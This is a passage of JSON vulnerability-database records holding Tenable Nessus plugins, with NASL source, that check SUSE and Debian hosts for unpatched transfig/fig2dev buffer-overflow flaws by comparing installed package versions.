"pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/09\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:transfig", "cpe:/o:novell:suse_linux:15"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "DEBIAN_DLA-2073.NASL", "hash": "b3fbe6f150ff3a4c5a56d3c3635f9997", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to write prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2020-01-22T00:00:00", "modified": "2021-01-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://packages.debian.org/source/jessie/transfig", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16140", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275"], "cvelist": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-08-19T12:17:14", "history": [{"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "49943ce95fb58a6ed16a279c5bd141e69a9aeb857e44c80a28c47b2cd40d2214", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 ", "published": "2020-01-22T00:00:00", "modified": "2020-01-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-01-27T22:53:07", "history": [], "viewCount": 15, "enchantments": {"dependencies": {"modified": "2020-01-27T22:53:07", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}]}, "score": {"modified": "2020-01-27T22:53:07", "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-01-27T22:53:07", "differentElements": ["cvss3", "modified"], "edition": 1}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "544d19b6bd0492aaf959e559d50ef9d9cfb5d7e106e8ad44b93bcf6d6078f8d9", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 ", "published": "2020-01-22T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-03-17T22:58:37", "history": [], "viewCount": 15, "enchantments": {"dependencies": {"modified": "2020-03-17T22:58:37", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}]}, "score": {"modified": "2020-03-17T22:58:37", "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-03-17T22:58:37", "differentElements": ["modified"], "edition": 2}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "8be2e50ffa874327964ccde90cbfce9c9cc3a61c82cd2e65013359922427ceb3", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 ", "published": "2020-01-22T00:00:00", "modified": "2020-06-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-06-01T01:10:37", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"modified": "2020-06-01T01:10:37", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-06-01T01:10:37", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-06-01T01:10:37", "differentElements": ["modified"], 